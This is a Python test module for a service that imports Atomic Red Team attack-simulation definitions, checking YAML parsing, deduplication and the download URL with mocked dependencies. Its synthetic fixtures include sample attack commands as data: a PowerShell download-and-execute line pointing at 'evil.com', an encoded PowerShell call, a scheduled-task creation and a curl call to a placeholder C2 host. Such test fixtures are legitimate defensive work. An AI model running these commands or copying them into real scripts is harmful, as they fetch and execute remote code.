"""Validation tests for T-108: Atomic Red Team Import Service.

Tests the YAML parsing logic and deduplication using synthetic data.
The ZIP download is replaced by a mock (``_download_zip`` is patched in
``test_no_duplicates``), so no test in this module needs network access.
"""

import sys
import os
import uuid
import tempfile
import shutil
from unittest.mock import MagicMock, patch, PropertyMock
from types import ModuleType
from pathlib import Path

# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
# Every stub below is installed only when the real module is not already in
# ``sys.modules``. They must all be in place BEFORE the service module is
# imported further down, so the order of this section matters.

# Make the parent directory of this file's directory importable.
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
    sys.path.insert(0, backend_dir)

if "pydantic_settings" not in sys.modules:
    pydantic_settings_mock = ModuleType("pydantic_settings")

    class _BaseSettings:
        """Minimal stand-in for ``BaseSettings``: accepts and ignores kwargs."""

        def __init__(self, **kwargs):
            pass

        def __init_subclass__(cls, **kwargs):
            super().__init_subclass__(**kwargs)

    pydantic_settings_mock.BaseSettings = _BaseSettings
    sys.modules["pydantic_settings"] = pydantic_settings_mock

if "app.config" not in sys.modules:
    config_mod = ModuleType("app.config")

    class _FakeSettings:
        """Static configuration values exposed as ``app.config.settings``."""

        DATABASE_URL = "sqlite:///:memory:"
        SECRET_KEY = "test"
        ALGORITHM = "HS256"
        ACCESS_TOKEN_EXPIRE_MINUTES = 60
        MINIO_ENDPOINT = "localhost:9000"
        MINIO_ACCESS_KEY = "test"
        MINIO_SECRET_KEY = "test"
        MINIO_BUCKET = "test"

    config_mod.settings = _FakeSettings()
    sys.modules["app.config"] = config_mod

if "app.database" not in sys.modules:
    db_mod = ModuleType("app.database")
    db_mod.Base = type("Base", (), {"metadata": MagicMock()})
    db_mod.get_db = MagicMock()
    sys.modules["app.database"] = db_mod

if "taxii2client" not in sys.modules:
    sys.modules["taxii2client"] = ModuleType("taxii2client")
    taxii_v20 = ModuleType("taxii2client.v20")
    taxii_v20.Server = MagicMock
    sys.modules["taxii2client.v20"] = taxii_v20

if "jose" not in sys.modules:
    jose_mod = ModuleType("jose")
    jose_mod.JWTError = Exception
    jose_mod.jwt = MagicMock()
    sys.modules["jose"] = jose_mod

if "boto3" not in sys.modules:
    boto3_mod = ModuleType("boto3")
    boto3_mod.client = MagicMock()
    sys.modules["boto3"] = boto3_mod
    sys.modules["botocore"] = ModuleType("botocore")
    sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
    sys.modules["botocore.exceptions"].ClientError = Exception

if "apscheduler" not in sys.modules:
    sys.modules["apscheduler"] = ModuleType("apscheduler")
    sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
    sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
    sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
    sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
    sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
    sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock

# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
# Deliberately placed after the stubs above rather than at the top of the file.

import yaml

from app.services.atomic_import_service import (
    _parse_yaml_files,
    _extract_zip,
    import_atomic_red_team,
    ATOMIC_RT_ZIP_URL,
)


# ---------------------------------------------------------------------------
# Helpers — create a synthetic atomics directory
# ---------------------------------------------------------------------------

def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path:
    """Create a fake atomics/ directory with YAML files.

    One sub-directory and one ``<technique id>.yaml`` file are written per
    entry of *techniques*.

    Parameters
    ----------
    tmp_dir : str
        Directory under which the ``atomics`` folder is created. Missing
        parent directories are created as well.
    techniques : dict
        Mapping from technique ID (e.g. "T1059.001") to a list of test dicts.

    Returns
    -------
    Path
        Path of the ``atomics`` directory.
    """
    atomics = Path(tmp_dir) / "atomics"
    atomics.mkdir(parents=True, exist_ok=True)

    for tech_id, tests in techniques.items():
        tech_dir = atomics / tech_id
        tech_dir.mkdir(exist_ok=True)
        yaml_data = {
            "attack_technique": tech_id,
            "display_name": f"Technique {tech_id}",
            "atomic_tests": tests,
        }
        yaml_path = tech_dir / f"{tech_id}.yaml"
        with open(yaml_path, "w", encoding="utf-8") as fh:
            yaml.dump(yaml_data, fh)

    return atomics


# ---------------------------------------------------------------------------
# 1. Parsing creates correct TestTemplate-like dicts
# ---------------------------------------------------------------------------

def test_parse_creates_templates():
    """Parse three synthetic atomic tests and check ids, source and platforms."""
    tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
    try:
        atomics = _create_fake_atomics(tmp_dir, {
            "T1059.001": [
                {
                    "name": "PowerShell Invoke-Expression",
                    "description": "Runs a PS command",
                    "supported_platforms": ["windows"],
                    "executor": {
                        "name": "powershell",
                        "command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')",
                    },
                },
                {
                    "name": "PowerShell Base64 Encoded",
                    "description": "Runs base64-encoded PS",
                    "supported_platforms": ["windows"],
                    "executor": {
                        "name": "powershell",
                        "command": "powershell -enc ZQBjaA==",
                    },
                },
            ],
            "T1053.005": [
                {
                    "name": "Scheduled Task Creation",
                    "description": "Creates a scheduled task",
                    "supported_platforms": ["windows", "linux"],
                    "executor": {
                        "name": "command_prompt",
                        "command": "schtasks /create /tn test /tr calc.exe",
                    },
                },
            ],
        })

        results = _parse_yaml_files(atomics)
        assert len(results) == 3, f"Expected 3 tests, got {len(results)}"

        # Verify atomic_test_id format
        ids = {r["atomic_test_id"] for r in results}
        assert "T1059.001-0" in ids
        assert "T1059.001-1" in ids
        assert "T1053.005-0" in ids

        # Check source is "atomic_red_team" (via source_url)
        for r in results:
            assert "atomic-red-team" in r["source_url"]

        # Check platforms
        for r in results:
            if r["technique_id"] == "T1053.005":
                assert "windows" in r["platforms"]
                assert "linux" in r["platforms"]

        print(" [PASS] Parsing creates correct templates with source and valid data")
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)


# ---------------------------------------------------------------------------
# 2. Running twice does not duplicate
# ---------------------------------------------------------------------------

@patch("app.services.atomic_import_service.TestTemplate")
@patch("app.services.atomic_import_service.log_action")
@patch("app.services.atomic_import_service._download_zip")
def test_no_duplicates(mock_download, mock_log, MockTestTemplate):
    """Import twice with same data — second run should skip everything."""
    import io
    import zipfile

    def _build_template(**kwargs):
        """Return a mock whose attributes mirror the constructor kwargs.

        The fields are assigned with ``setattr`` instead of being forwarded
        to ``MagicMock(**kwargs)``: ``MagicMock`` reserves some keyword names
        for itself (``name``, ``spec``, ``return_value``, ...), so a field
        called ``name`` would label the mock rather than become an attribute.
        """
        template = MagicMock()
        for field, value in kwargs.items():
            setattr(template, field, value)
        return template

    # Make TestTemplate() return a mock each time
    MockTestTemplate.side_effect = _build_template
    # Keep atomic_test_id queryable
    MockTestTemplate.atomic_test_id = MagicMock()
    MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True)

    # Build a fake ZIP
    tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_")
    try:
        # Only the files written to disk matter here; the returned path is
        # not needed because the whole tmp_dir is zipped below.
        _create_fake_atomics(
            os.path.join(tmp_dir, "atomic-red-team-master"),
            {
                "T1059.001": [
                    {
                        "name": "Test One",
                        "description": "Desc",
                        "supported_platforms": ["windows"],
                        "executor": {"name": "sh", "command": "echo test"},
                    },
                ],
            },
        )

        # Create a ZIP from the tmp_dir
        zip_buffer = io.BytesIO()
        with zipfile.ZipFile(zip_buffer, "w") as zf:
            root = Path(tmp_dir)
            for file_path in root.rglob("*"):
                if file_path.is_file():
                    arcname = str(file_path.relative_to(root))
                    zf.write(file_path, arcname)
        zip_bytes = zip_buffer.getvalue()

        mock_download.return_value = zip_bytes

        # --- First import ---
        # Mock DB: no existing templates
        db = MagicMock()
        mock_query = MagicMock()
        mock_query.filter.return_value.all.return_value = []
        db.query.return_value = mock_query

        added_templates = []
        db.add.side_effect = added_templates.append

        result1 = import_atomic_red_team(db)
        assert result1["created"] == 1
        assert result1["skipped_existing"] == 0

        # --- Second import ---
        # Now DB returns the existing template
        db2 = MagicMock()
        mock_query2 = MagicMock()
        # Return the atomic_test_id that was already created
        mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)]
        db2.query.return_value = mock_query2

        added2 = []
        db2.add.side_effect = added2.append

        result2 = import_atomic_red_team(db2)
        assert result2["created"] == 0
        assert result2["skipped_existing"] == 1
        assert len(added2) == 0

        print(" [PASS] Running twice does not duplicate templates")
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)


# ---------------------------------------------------------------------------
# 3. Templates mapped correctly to MITRE techniques
# ---------------------------------------------------------------------------

def test_templates_mapped_to_techniques():
    """Check that each parsed result carries the technique id of its YAML file."""
    tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
    try:
        atomics = _create_fake_atomics(tmp_dir, {
            "T1059.001": [
                {
                    "name": "Test",
                    "description": "Desc",
                    "supported_platforms": ["windows"],
                    "executor": {"name": "sh", "command": "echo hi"},
                },
            ],
            "T1071.001": [
                {
                    "name": "HTTP C2",
                    "description": "HTTP-based C2",
                    "supported_platforms": ["linux"],
                    "executor": {"name": "bash", "command": "curl http://c2.evil"},
                },
            ],
        })

        results = _parse_yaml_files(atomics)
        technique_ids = {r["technique_id"] for r in results}
        assert "T1059.001" in technique_ids
        assert "T1071.001" in technique_ids

        for r in results:
            assert r["technique_id"].startswith("T")

        print(" [PASS] Templates mapped correctly to MITRE techniques")
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)


# ---------------------------------------------------------------------------
# 4. Service module structure is correct
# ---------------------------------------------------------------------------

def test_service_module_structure():
    """Verify the service has all expected public functions."""
    from app.services import atomic_import_service as svc

    assert hasattr(svc, "import_atomic_red_team")
    assert callable(svc.import_atomic_red_team)
    assert hasattr(svc, "ATOMIC_RT_ZIP_URL")
    assert "github.com" in svc.ATOMIC_RT_ZIP_URL
    print(" [PASS] Service module has correct structure")


# ---------------------------------------------------------------------------
# 5. ZIP URL is correct (no rate-limit concern with ZIP download)
# ---------------------------------------------------------------------------

def test_zip_url_no_rate_limit():
    """The URL should be a direct ZIP download, not an API endpoint."""
    assert "/archive/" in ATOMIC_RT_ZIP_URL
    assert "api.github.com" not in ATOMIC_RT_ZIP_URL
    print(" [PASS] ZIP download URL avoids API rate limits")


# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------

if __name__ == "__main__":
    print("T-108 Validation: Atomic Red Team Import Service")
    print("=" * 55)
    test_parse_creates_templates()
    # The @patch decorators supply the three mock arguments.
    test_no_duplicates()
    test_templates_mapped_to_techniques()
    test_service_module_structure()
    test_zip_url_no_rate_limit()
    print("=" * 55)
    print("ALL T-108 validations PASSED!")